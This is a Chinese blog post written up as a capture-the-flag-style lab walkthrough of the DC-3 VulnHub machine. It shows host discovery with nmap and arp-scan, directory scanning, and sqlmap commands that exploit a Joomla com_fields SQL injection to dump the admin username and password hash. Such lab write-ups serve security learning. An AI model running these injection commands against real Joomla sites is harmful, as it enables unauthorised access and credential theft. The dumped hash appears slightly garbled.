theme: nico
持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第18天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情
信息收集
1.首先确认kali与DC-3所在网段
ip add
编辑
确认kali与DC-3所在网段为192.168.79.0/24网段
2.查找DC-3 ip 可以使用nmap 或者 arp-scan
方法一:
arp-scan -l
编辑
方法二:
nmap -sP 192.168.79.0/24
编辑
最终可以确认
kali :192.168.79.128
DC-3 :192.168.79.131
扫描DC-3开启的服务
nmap -v -A 192.168.79.131
编辑
编辑
通过扫描可以发现 DC-3开启了80端口 并且使用了Joomla! cms
4.访问网站192.168.79.131
编辑
5.扫描敏感目录看看
我这里使用的是7kbscan-WebPathBrute.1.6.2用御剑也是一样的
编辑
编辑
找到后台登录网站。
因为是常见的cms,所以我们直接扫Joomla! cms常见漏洞
漏洞扫描
git clone github.com/iceyhexman/…
cd onlinetools
pip3 install -r requirements.txt
nohup python3 main.py &
2.安装完成后访问 http://192.168.79.128:8000/
编辑
3.使用里面cms漏洞扫描
编辑
4.测试payload的有效性
payload:
编辑
确认payload有效
5.既然是SQL注入漏洞 配合sqlmap 以及前面目录爆破出来的后台登录网站,来登录后台
我这里使用是sqlmap windows的版本
python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" --dbs
//*表示注入位置
//查询所有数据库
编辑
得到下面5个数据库 既然是joomla! 那我们也顺其自然的查询joomladb 数据库
python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" --tables
//查joomlab 数据库下面的表
编辑
一共有8 90条 有一个#_users 看样子里面就应该有相关后台信息
接下来查询#_users表内的列名
python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" --columns
//查询#_users表内的列名
都是一路y或者回车
编辑
确定列名 账号密码一般为“username,password”
获得表中的账号密码
python sqlmap.py -u "http://192.168.79.131//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D "joomladb" -T "#__users" -C "username,password" --dump
//读取指定字段内容
编辑
获得账号密码
±---------±-------------------------------------------------------------+
| username | password |
±---------±-------------------------------------------------------------+
| admin | $2y10 1010DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
±---------±-------------------------------------------------------------+
hash解密
